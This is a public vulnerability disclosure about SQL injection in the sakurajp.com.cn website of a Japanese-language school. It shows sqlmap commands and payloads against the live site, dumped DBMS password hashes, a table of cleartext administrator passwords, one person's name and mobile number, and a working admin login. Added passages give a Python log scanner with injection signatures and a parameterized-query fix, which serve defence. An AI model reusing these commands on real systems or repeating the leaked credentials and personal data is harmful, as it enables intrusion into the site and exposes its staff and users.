2015-09-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-10-23: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
Sakura International Japanese (樱花国际日语) has a SQL injection vulnerability (sa privileges) that allows logging into the admin backend, exposing the names, mobile numbers, locations and other information of 1.87 million users. Sakura International Japanese: let your life blossom!
Testing with sqlmap:
1. Initial test
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId --dbs --current-user --users --is-dba --password --threads=10
2. Continuing the test (the passwords turn out to be stored in cleartext)
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D neworld_sakura -T admin -C id,logname,pwd --dump
3. Extracting the administrator password (admin888)
sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D SakuraCMS -T UserInfo -C Email,Mobile,RealName,UserAccount,UserId,UserPwd --dump
Parameter: cityId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: vid=38&cityId=0 AND 2957=2957

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: vid=38&cityId=0 AND 6349=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6349=6349) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)))
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'jackchenyang'
current user is DBA: True
database management system users [5]:
[*] jackchenyang
[*] sa
[*] SakuraCMS
[*] sakuraweb
[*] swx

database management system users password hashes:
[*] jackchenyang [1]:
    password hash: 0x010064f6592203bbeddb5d1fc28c20eef1005365b022da05ff7a
        header: 0x0100
        salt: 64f65922
        mixedcase: 03bbeddb5d1fc28c20eef1005365b022da05ff7a
[*] sa [1]:
    password hash: 0x01004086ceb6acb6cb34f9ad21709304eb07039aedfa8a57ff0a
        header: 0x0100
        salt: 4086ceb6
        mixedcase: acb6cb34f9ad21709304eb07039aedfa8a57ff0a
[*] SakuraCMS [1]:
    password hash: 0x010042a0ef21f2a16e2f3d5fea957822df49ca86f56ea2d1ff12
        header: 0x0100
        salt: 42a0ef21
        mixedcase: f2a16e2f3d5fea957822df49ca86f56ea2d1ff12
[*] sakuraweb [1]:
    password hash: 0x010019d2c4a84e8b68049969c35ae38e557642a4f99736c7797e
        header: 0x0100
        salt: 19d2c4a8
        mixedcase: 4e8b68049969c35ae38e557642a4f99736c7797e
[*] swx [1]:
    password hash: 0x01006df54d7734de89907c0cf0aa1b131fdbe16a1fc135853ff8
        header: 0x0100
        salt: 6df54d77
        mixedcase: 34de89907c0cf0aa1b131fdbe16a1fc135853ff8

available databases [9]:
[*] liuxueDB
[*] LX
[*] master
[*] model
[*] msdb
[*] neworld_sakura
[*] SakuraCMS
[*] tempdb
[*] WeiXinCMS
Database: neworld_sakura
[61 tables]
+----------------------------+
| Activities                 |
| AdManage                   |
| Dm_Mobile                  |
| Gift                       |
| Sakura_AD                  |
| Sakura_Gift                |
| Sakura_Register            |
| Sakura_Tips                |
| Sakura_batch               |
| Sakura_log                 |
| Smart_AdGroup              |
| Smart_AdList               |
| Smart_AdManage             |
| Smart_AuthInfo             |
| Smart_Channel              |
| Smart_Channel_CustomFields |
| Smart_City                 |
| Smart_Content              |
| Smart_Custom_Pages         |
| Smart_Custom_Tags          |
| Smart_Dict                 |
| Smart_Event                |
| Smart_Extend_Blogroll      |
| Smart_Log                  |
| Smart_Media                |
| Smart_MenuInfo             |
| Smart_RoleInfo             |
| Smart_Special              |
| Smart_Upload               |
| Smart_User                 |
| UserInfo                   |
| UserInfos                  |
| UserMenu                   |
| UserPermission             |
| UserRole                   |
| admin                      |
| aduser                     |
| db_Active                  |
| db_AdMange                 |
| db_Admin                   |
| db_City                    |
| db_DistinctMb              |
| db_Log                     |
| db_Media                   |
| db_Media_log               |
| db_Register                |
| db_batch                   |
| dtproperties               |
| s_area                     |
| s_city                     |
| s_info                     |
| s_job                      |
| s_mobile                   |
| s_news                     |
| s_template                 |
| s_templatetables           |
| sysdiagrams                |
| v_AdMange                  |
| v_RegisterList             |
| v_index                    |
| v_votess_download          |
+----------------------------+

Database: neworld_sakura
Table: admin
[30 entries]
+----+------------+---------------------+
| id | logname    | pwd                 |
+----+------------+---------------------+
| 1  | admin      | sakurajp1234567*()  |
| 10 | 深圳       | sakurajpsz_d8k      |
| 11 | 苏州       | sz_sakurajp         |
| 12 | 杭州       | hz_sakurajp         |
| 13 | 无锡       | wx_sakurajp         |
| 14 | 宁波       | nb_sakurajp         |
| 15 | 东莞       | <blank>             |
| 16 | test       | test                |
| 17 | 南京       | nj_sakurajp         |
| 18 | 南通       | nt_sakurajp         |
| 19 | 天津       | tj_sakurajp         |
| 20 | 重庆       | 123456              |
| 21 | sakurajpCD | CDsakurajp          |
| 22 | 厦门       | 1234567             |
| 23 | 合肥       | sakurajphf_1126     |
| 24 | 昆山       | sakurajpks_1126     |
| 25 | 江苏       | js_sakurajp         |
| 26 | 武汉       | wh_sakurajp         |
| 28 | 常州       | cz_sakurajp         |
| 29 | 福州       | <blank>             |
| 30 | 佛山       | fs_sakurajp         |
| 31 | 广东       | gd_sakurajp         |
| 32 | 福建       | fj_sakurajp         |
| 35 | 济南       | jn_sakurajp123      |
| 36 | 常熟       | changshu            |
| 5  | 北京       | sakurajpbj_843      |
| 6  | 上海       | sakurajpsh021       |
| 7  | 青岛       | sakurajpqd_klu123   |
| 8  | 大连       | dl112233            |
| 9  | 广州       | sakurajpgz_520      |
+----+------------+---------------------+
Database: SakuraCMS
Table: UserInfo
[1 entry]
+----------------------+-------------+----------+-------------+--------+----------------------------------+
| Email                | Mobile      | RealName | UserAccount | UserId | UserPwd                          |
+----------------------+-------------+----------+-------------+--------+----------------------------------+
| [email protected]    | 18221892552 | 陈阳     | admin       | 1      | 7FEF6171469E80D32C0559F88B377245 |
+----------------------+-------------+----------+-------------+--------+----------------------------------+
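The injection-point summary sqlmap printed above names two techniques, a boolean-based blind check that appends a numeric tautology (AND 2957=2957) to cityId, and an MSSQL error-based check built from CONVERT(INT, ...) and CHAR(). Both leave a distinctive trace in the web server's access log. The following is an added example, not part of the original report, of detection logic in Python that parses IIS W3C-format log lines, percent-decodes each query parameter, and flags those two shapes plus any non-numeric content in parameters the application treats as integers. The log lines, the field layout and the set of integer parameters are assumptions constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-format log excerpt (assumption, not from the report). IIS
# writes cs-uri-query URL-encoded, and "-" marks an empty field.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2015-09-08 10:00:01 10.0.0.5 GET /channel.aspx vid=38&cityId=0 80 203.0.113.7 200
2015-09-08 10:00:02 10.0.0.5 GET /channel.aspx vid=38&cityId=0%20AND%202957%3D2957 80 203.0.113.7 200
2015-09-08 10:00:03 10.0.0.5 GET /channel.aspx vid=38&cityId=0%20AND%206349%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%29%29 80 203.0.113.7 500
2015-09-08 10:00:04 10.0.0.5 GET /channel.aspx vid=38&cityId=12 80 198.51.100.9 200
2015-09-08 10:00:05 10.0.0.5 GET /index.aspx - 80 198.51.100.9 200
"""

# Parameters the application treats as integers (assumption, inferred from the
# vulnerable URL); anything non-numeric in them deserves a look on its own.
INTEGER_PARAMS = {"vid", "cityId"}

# Signatures for the two techniques in the sqlmap summary: a numeric tautology
# joined with AND/OR, and error-based extraction via CONVERT(INT, ...) and CHAR().
SIGNATURES = [
    ("boolean-blind tautology", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("mssql error-based CONVERT", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("CHAR() string building", re.compile(r"\bCHAR\s*\(\s*\d+\s*\)", re.I)),
]


def analyse_query(raw_query):
    """Return (param, reason) findings for one raw cs-uri-query value."""
    findings = []
    if raw_query == "-":
        return findings
    # parse_qsl percent-decodes each value, so %20/%3D/%28 become the characters
    # the database engine would actually have seen.
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
            findings.append((name, "non-integer value in integer parameter"))
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((name, label))
    return findings


def scan_log(text):
    """Parse a W3C log and return one record per line that produced findings."""
    fields, hits = None, []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # the directive defines the column order
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                    # malformed line: skip rather than guess
        rec = dict(zip(fields, parts))
        findings = analyse_query(rec.get("cs-uri-query", "-"))
        if findings:
            hits.append({"line": line_no, "client": rec.get("c-ip"),
                         "uri": rec.get("cs-uri-stem"), "status": rec.get("sc-status"),
                         "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["client"], hit["uri"], hit["status"], hit["findings"])
```

Run against the constructed excerpt, the scanner reports lines 3 and 4 only; the error-based probe also shows up as a 500 response, which is the kind of status-code correlation worth alerting on even where the signature is missed. The integer-parameter check is the more durable of the two rules, since it does not depend on the exact payload wording.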
Backend login URL: http://www.sakurajp.com.cn/admin
Username: admin, password: admin888
There are 1,875,749 users in total, and their names, locations, mobile numbers and other details are all exposed.
Fix: add input filtering.
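The fix the report asks for comes down to treating cityId as a number rather than as SQL text. The following is an added example, not part of the original report or the site's code, that places the flawed query-building pattern beside its hardened form in Python. sqlite3 stands in for the site's Microsoft SQL Server backend (an assumption; both engines behave the same way for this case), the table and rows are constructed, and the false probe value 2957=2958 is my counterpart to the true probe sqlmap used.

```python
import sqlite3

# sqlite3 is a stand-in for the MSSQL backend named in the report (assumption).
# Constructed rows shaped like a channel/city lookup; not data from the site.
CONSTRUCTED_ROWS = [
    (38, 0, "national"),
    (38, 5, "beijing"),
    (38, 6, "shanghai"),
    (39, 0, "other-channel"),
]


def build_db():
    """Build an in-memory table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE channel (vid INTEGER, cityId INTEGER, title TEXT)")
    conn.executemany("INSERT INTO channel VALUES (?, ?, ?)", CONSTRUCTED_ROWS)
    return conn


def vulnerable_lookup(conn, vid, city_id):
    """The flawed pattern: request values spliced straight into the SQL text.

    Whatever follows the number in cityId becomes part of the WHERE clause, which
    is exactly the true/false oracle a boolean-based blind test relies on.
    """
    sql = f"SELECT title FROM channel WHERE vid={vid} AND cityId={city_id}"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, vid, city_id):
    """The fix: validate the type, then bind the value as a query parameter.

    int() rejects anything that is not a whole number, and a bound parameter is
    handed to the engine as data, so it can never extend the statement.
    """
    try:
        vid_n, city_n = int(vid), int(city_id)
    except (TypeError, ValueError):
        raise ValueError("vid and cityId must be integers") from None
    sql = "SELECT title FROM channel WHERE vid=? AND cityId=?"
    return [row[0] for row in conn.execute(sql, (vid_n, city_n))]


def rejects(conn, vid, city_id):
    """True if safe_lookup refuses the input (useful for tests and for logging)."""
    try:
        safe_lookup(conn, vid, city_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    # The report's true probe, then a constructed false probe: the flawed version
    # answers differently, which is the whole basis of the blind technique.
    print(vulnerable_lookup(db, "38", "0 AND 2957=2957"))  # ['national']
    print(vulnerable_lookup(db, "38", "0 AND 2957=2958"))  # []
    print(safe_lookup(db, "38", "0"))                      # ['national']
    print(rejects(db, "38", "0 AND 2957=2957"))            # True
```

The same change applies verbatim in ASP.NET with SqlParameter in place of the `?` placeholders. Two other points the sqlmap output makes are worth folding into the fix: the web application's database login was a DBA (current user is DBA: True), so a least-privilege login limited to the tables the site needs would have contained the impact, and the admin table stored passwords in cleartext, which a parameterized query does nothing to address.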
Vendor response: the vendor could not be reached, or the vendor actively refused.